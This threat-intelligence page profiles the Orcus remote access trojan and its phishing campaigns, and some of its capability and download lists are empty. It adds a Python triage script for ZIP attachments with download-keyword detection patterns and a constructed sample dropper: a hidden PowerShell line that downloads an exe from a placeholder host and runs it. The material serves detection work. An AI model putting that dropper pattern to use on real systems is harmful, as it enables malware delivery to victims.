Orcus RAT is a Remote Access Trojan that has been active since 2016. Orcus was developed by a malware author who goes by the name ‘Sorzus’. This RAT has been sold for $40 since April 2016, with the ability to build custom plugins. Orcus RAT is primarily distributed via spear-phishing emails and drive-by downloads.
Capabilities of Orcus RAT
The Remote Access Trojan’s capabilities include:
Orcus RAT distributed via decoy Word document
Researchers spotted a malspam campaign distributing Orcus RAT via malicious Microsoft Word documents.
Orcus RAT targets Bitcoin investors
A phishing campaign disguised as email marketing for a new Bitcoin trading bot dubbed ‘Gunbot’ distributed Orcus RAT.
Tax-themed phishing campaign
In January 2018, researchers spotted various tax-related phishing campaigns targeting US taxpayers with a range of RATs including Orcus RAT, Netwire, and Remcos RAT.
Ramadan-themed Coca-Cola video distributes Orcus RAT
In February 2019, researchers observed a malware campaign that distributed Orcus RAT inside a Ramadan-themed Coca-Cola video. Clicking the video triggered a series of downloads and processes, which included:
Revenge RAT and Orcus RAT
In a recent malspam campaign, researchers spotted a threat actor distributing two popular remote access trojans to launch attacks against different organizations across various sectors. The targeted sectors include financial services, information technology, consultancies, and government entities.
The malspam emails purported to come from various authorities such as the Better Business Bureau (BBB), Australian Competition & Consumer Commission (ACCC), Ministry of Business, Innovation & Employment (MBIE) and other regional agencies.
The emails included ZIP archives that contained malicious batch files responsible for retrieving the malicious PE32 file and dropping Orcus RAT and Revenge RAT onto victims’ systems.
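The delivery chain described above (ZIP attachment, batch script inside, script fetches a PE32 binary and launches it) is something a mail gateway or triage script can look for before the message reaches a user. The following is an added example written for this page, not code from the original article or from any vendor product: it opens a ZIP attachment, flags script files whose content carries download or process-launch indicators, and identifies PE32/PE32+ files from their headers rather than their extension, so a dropped executable renamed to look like an image is still caught. The sample archive, the batch script text and the header-only PE32 blob are constructed for the example; the detection keyword lists are assumed heuristics, not indicators taken from the campaign.

```python
"""Triage a ZIP e-mail attachment for the batch-script-fetches-PE32 delivery pattern.
Example code for this page; the sample archive and its contents are constructed."""
import io
import re
import struct
import zipfile

SCRIPT_EXTS = (".bat", ".cmd", ".vbs", ".js", ".ps1")
EXEC_EXTS = (".exe", ".dll", ".scr")

# Assumed heuristics: tokens typical of scripts that pull a payload from the network...
DOWNLOAD_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b",
    r"bitsadmin\s+/transfer|certutil\s+-urlcache",
    r"https?://",
)]
# ...and of scripts that start what they fetched, often with a hidden window.
LAUNCH_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"\bstart\b.*\.exe", r"-w(indowstyle)?\s+hidden", r"\bregsvr32\b|\brundll32\b",
)]

# Constructed batch script standing in for the dropper; example.invalid never resolves.
SAMPLE_BAT = (
    "@echo off\r\n"
    "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
    "'http://example.invalid/update.exe','%TEMP%\\update.exe')\"\r\n"
    "start %TEMP%\\update.exe\r\n"
)


def pe_kind(data: bytes):
    """Return 'PE32', 'PE32+' or None by parsing the DOS and PE headers."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 26 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]  # optional header magic
    return {0x10B: "PE32", 0x20B: "PE32+"}.get(magic)


def classify_script(text: str):
    """Reasons a script body looks like a downloader/launcher (empty if none)."""
    reasons = []
    if any(p.search(text) for p in DOWNLOAD_PATTERNS):
        reasons.append("downloads remote content")
    if any(p.search(text) for p in LAUNCH_PATTERNS):
        reasons.append("launches/hides a process")
    return reasons


def triage_zip(zip_bytes: bytes):
    """Return [(member name, [reasons])] for every suspicious member of the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info)
            name = info.filename.lower()
            reasons = []
            if name.endswith(SCRIPT_EXTS):
                reasons.append("script attachment")
                reasons += classify_script(data.decode("utf-8", "replace"))
            kind = pe_kind(data)  # trust the header, not the extension
            if kind:
                tag = f"{kind} executable"
                if not name.endswith(EXEC_EXTS):
                    tag += " with non-exe extension"
                reasons.append(tag)
            if reasons:
                findings.append((info.filename, reasons))
    return findings


def verdict(findings) -> str:
    """Block on a downloader script; queue anything else suspicious for review."""
    if any("downloads remote content" in r for _, r in findings):
        return "block"
    return "review" if findings else "allow"


def build_sample_pe32() -> bytes:
    """Header-only blob that parses as PE32 (constructed; it is not runnable code)."""
    blob = bytearray(0x80)
    blob[0:2] = b"MZ"
    struct.pack_into("<I", blob, 0x3C, 0x40)        # e_lfanew -> PE signature
    blob[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", blob, 0x40 + 24, 0x10B)  # optional header magic: PE32
    return bytes(blob)


def build_sample_zip() -> bytes:
    """Constructed attachment: a dropper-style .bat, a PE renamed .jpg, a benign note."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Complaint_12345.bat", SAMPLE_BAT)
        zf.writestr("logo.jpg", build_sample_pe32())
        zf.writestr("readme.txt", "Please see attached.")
    return buf.getvalue()


if __name__ == "__main__":
    hits = triage_zip(build_sample_zip())
    for member, why in hits:
        print(f"{member}: {', '.join(why)}")
    print("verdict:", verdict(hits))
```

The header check matters more than the extension check: renaming a payload does not change its `MZ`/`PE\0\0` headers, and the optional-header magic distinguishes 32-bit PE32 (0x10B) from PE32+ (0x20B). The keyword lists will produce false positives on legitimate admin scripts, so the function returns a "review" verdict for weaker signals rather than blocking on them.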